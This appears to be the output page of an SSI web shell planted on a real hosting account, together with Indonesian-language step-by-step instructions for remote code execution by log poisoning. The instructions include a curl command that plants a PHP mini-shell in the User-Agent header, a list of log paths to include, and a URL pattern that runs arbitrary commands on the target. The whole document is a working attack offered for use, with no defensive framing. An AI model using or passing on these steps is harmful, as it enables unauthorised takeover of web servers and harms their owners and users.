SERVER ROOT: /home/sannicwu/public_html
SERVER SOFTWARE: LiteSpeed
REMOTE ADDRESS: 216.73.216.42
Click "TEST #exec" to check capability.
No command executed yet, bro. Enter one above!
WARNING: Jika #exec dimatikan, perintah di atas tidak akan jalan.
No file included yet, bro. Enter a path above!
Jika fitur SSI #exec di atas tidak berfungsi (tidak ada output dari test command), maka server LiteSpeed lo sangat aman dari #exec. Tapi jangan khawatir, kita punya teknik Log Poisoning untuk Remote Code Execution (RCE) via #include!
1. INJECT KODE PHP MINI-SHELL KE LOG FILE:
Gunakan `curl` dari terminal lo untuk mengirim request ke server target dengan User-Agent yang berisi kode PHP mini-shell. Contoh:
curl -A "<?php system(\$_GET[\'h\']); ?>" http://target.com/index.html
PENTING:
2. IDENTIFIKASI PATH LOG FILE:
Gunakan bagian "FILE INCLUSION" di shell ini. Masukkan path-path log umum (misal: `/var/log/apache2/access.log`, `/var/log/httpd/access_log`). Jika berhasil, lo akan melihat isi log file.
Contoh path log: /var/log/apache2/access.log
3. EKSEKUSI PERINTAH VIA LOG FILE YANG TERPOLUSI:
Setelah lo berhasil meng-include log file yang sudah diinjeksi PHP, lo bisa menjalankan perintah dengan menambahkan parameter `&h=YOUR_COMMAND` ke URL shell SSI lo. Contoh:
http://target.com/path/hackersec_ssi_shell.shtml?include_file=/var/log/apache2/access.log&h=ls%20-la
HASILNYA: Server akan meng-include log file, PHP di dalam log itu akan dieksekusi, dan lo akan melihat output perintah di browser! PWNED!